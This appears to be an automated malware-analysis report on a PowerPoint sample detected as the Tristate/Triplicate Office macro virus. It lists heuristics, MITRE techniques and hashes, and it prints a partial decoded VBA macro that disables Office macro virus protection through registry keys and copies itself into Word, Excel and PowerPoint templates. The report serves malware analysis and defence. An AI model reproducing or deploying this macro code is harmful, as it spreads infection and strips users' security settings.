MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a PowerPoint file containing VBA macros that attempt to disable macro virus protection and inject code into Office templates for persistence. The ClamAV detection of 'Win.Trojan.Tristate-2' and 'Doc.Trojan.Tristate-1' strongly suggests this family. The script explicitly modifies registry keys related to Office macro protection and template settings, indicating a persistence mechanism.
Heuristics 6
-
ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Tristate-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10045 bytes |
SHA-256: af06f7fb54014a31a1b990466f402f905ab7f7c545da5b0712d6cec33ab6d899 |
|||
|
Detection
ClamAV:
Doc.Trojan.Tristate-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Triplicate"
Public Sub DisableAV()
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
End Sub
'<!--1nternal-->
'Triplicate v0.21 /1nternal
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set TT = Templates(1).VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.DeleteLines 1, AD.CountofLines
AD.InsertLines 1, TT.Lines(1, TT.CountofLines)
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
AD.InsertLines 1, NT.Lines(1, NT.CountofLines)
End If
End If
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
NT.DeleteLines 1, NT.CountofLines
NT.InsertLines 1, AD.Lines(1, AD.CountofLines)
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
End If
xlApp.Quit
Set PPObj = CreateObject("PowerPoint.Application")
Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse)
For Each ModComponent In PBT.VBProject.VBComponents
If ModComponent.Name = "Triplicate" Then dontadd = True
Next
If dontadd <> True Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = ""
Set NewMod = PBT.VBProject.VBComponents.Add(1)
NewMod.Name = "Triplicate"
NewMod.CodeModule.InsertLines 1, NT.Lines(1, NT.CountofLines)
NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)"
Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight)
With ShapetoWack
.Name = "Triplicate"
.ZOrder (1)
.Line.Visible = False
.Fill.Visible = False
.ActionSettings(1).Action = 8
... (truncated)
|
|||
embedded_office_off00001240.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x1240 | 13760 bytes |
SHA-256: 2058183bc119e3a15fab0b68f6d14f0c96cee2df27f5edf448497183cdcd5e54 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.